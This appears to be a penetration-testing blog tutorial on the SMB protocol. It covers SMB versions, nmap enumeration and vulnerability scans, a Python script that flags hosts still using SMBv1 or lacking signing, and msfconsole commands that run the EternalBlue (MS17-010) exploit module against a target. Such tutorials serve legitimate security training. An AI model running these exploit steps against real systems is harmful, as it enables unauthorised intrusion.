September 09, 2021

Network penetration testing: SMB protocol


Understanding SMB

SMB is a network file and resource sharing protocol that follows a client-server model. Any client on the network can talk to an SMB server to access resources such as files and directories, or to submit tasks such as printing over the network.

How does SMB work?

SMB communication is straightforward: the SMB client connects to the SMB server on the SMB port (445 for newer versions; older versions used 139 over NetBIOS) and accesses the shares. Once the client has access to a share, it can mount it on its own system and work with the files without copying them to the local machine, or print to a network printer.

Versions of SMB

SMBv1: The first version of SMB. It originated in the 1980s and has gone through multiple revisions. Microsoft first implemented SMBv1 in Windows 95, introducing CIFS (Common Internet File System). This version is so weak that it should never be used in modern network communication: it has no encryption, and it is the version exploited by ransomware such as WannaCry and NotPetya.

SMBv2: This version was introduced with Windows Vista. It improved performance and offered security enhancements compared to the previous version. Later, version 2.1 was introduced with Windows 7 and Windows Server 2008 R2, adding oplocks (opportunistic locks) as a feature.

SMBv3: This is the latest and most secure version of SMB so far. It provides end-to-end encryption of the traffic between client and server. It first shipped with Windows 8 and Server 2012; later v3.2 was introduced in Windows 8.1 and Server 2012 R2. The latest revision is 3.1.1, which is used in Windows 10 and Server 2016.


During the enumeration phase a pentester should look for the following information from the SMB service:

- Banner grabbing
- User listing
- User workgroup
- Network share information
- Remote operating system
- SMB security mode and version

To gather these details we use the popular network scanner nmap (the -A option runs OS detection, version detection and the default NSE scripts, which include the SMB ones):

    nmap -p 445,139 -A <Target IP>

The information we get from the result is:

Operating System: Windows 7 Ultimate

Computer name: WIN-8KGN3AE06PK

SMB Security Mode: 2.02


Scanning for vulnerabilities:

Enumeration gives us the SMB version and the host operating system. Now it is time for vulnerability scanning. Again we use nmap, which ships with a large number of NSE scripts for identifying known vulnerabilities; the smb-vuln* wildcard selects all of the SMB ones.

    nmap --script "smb-vuln*" -p 445 <Target IP>

The scan results show that the host is vulnerable to EternalBlue (MS17-010) because SMBv1 is still enabled.
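Across a whole network the scan output above is easier to act on in bulk. The following Python script is an added example, not part of the original post: it parses nmap's XML output (-oX) from the smb-protocols and smb-security-mode NSE scripts (assumed to have been included in the scan) and lists the hosts that still speak SMBv1 or do not require message signing, which are the ones to fix before the MS17-010 check even becomes necessary. The XML report is a constructed sample, not real scan output.

```python
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -oX` output (not a real scan) for two hosts scanned with
# `nmap --script smb-protocols,smb-security-mode -p 445`; only the SMB script results are kept.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
 <host><address addr="192.0.2.10" addrtype="ipv4"/>
  <ports><port protocol="tcp" portid="445"><state state="open"/>
   <script id="smb-protocols" output="dialects"><table key="dialects">
    <elem>NT LM 0.12 (SMBv1) [dangerous, but default]</elem><elem>2.02</elem><elem>2.10</elem>
   </table></script>
   <script id="smb-security-mode" output="message_signing: disabled">
    <elem key="message_signing">disabled (dangerous, but default)</elem></script>
  </port></ports></host>
 <host><address addr="192.0.2.20" addrtype="ipv4"/>
  <ports><port protocol="tcp" portid="445"><state state="open"/>
   <script id="smb-protocols" output="dialects"><table key="dialects">
    <elem>2.10</elem><elem>3.11</elem></table></script>
   <script id="smb-security-mode" output="message_signing: required">
    <elem key="message_signing">required</elem></script>
  </port></ports></host>
</nmaprun>"""

def smb_findings(nmap_xml):
    """Per host: advertised SMB dialects, whether SMBv1 is still enabled (the version
    MS17-010 / EternalBlue targets) and whether SMB signing is required."""
    findings = {}
    for host in ET.fromstring(nmap_xml).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        # signing status unknown (script did not run) is treated as "not required"
        entry = {"dialects": [], "smbv1": False, "signing_required": False}
        for script in host.iter("script"):
            if script.get("id") == "smb-protocols":
                entry["dialects"] = [e.text.strip() for e in script.iter("elem") if e.text]
                entry["smbv1"] = any("SMBv1" in d for d in entry["dialects"])
            elif script.get("id") == "smb-security-mode":
                for e in script.iter("elem"):
                    if e.get("key") == "message_signing" and e.text:
                        entry["signing_required"] = e.text.strip().startswith("required")
        if entry["dialects"]:  # host answered the SMB scripts
            findings[addr.get("addr")] = entry
    return findings

def hosts_to_remediate(findings):
    """Hosts that need SMBv1 disabled or signing enforced, sorted by address."""
    return sorted(ip for ip, f in findings.items() if f["smbv1"] or not f["signing_required"])
```

Run it against a real report with `smb_findings(open("scan.xml").read())`; the hosts it returns are the same ones a follow-up smb-vuln* scan would flag first.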

Exploiting SMB vulnerability:

Now that we know which vulnerability is present, we exploit it with Metasploit and gain privileges on the host.

We run the following commands in msfconsole on the attacker system:

> msfconsole

> use exploit/windows/smb/ms17_010_eternalblue

> set rhost <Victim IP>

> exploit



Closing words:

This is not the only way to exploit SMB; there are other approaches such as PsExec, password brute-forcing and NTLM hash capture.

I feel the above technique is not that complex, as Metasploit always makes a hacker's life easy.

I hope you find this article valuable and helpful. Happy Hacking!!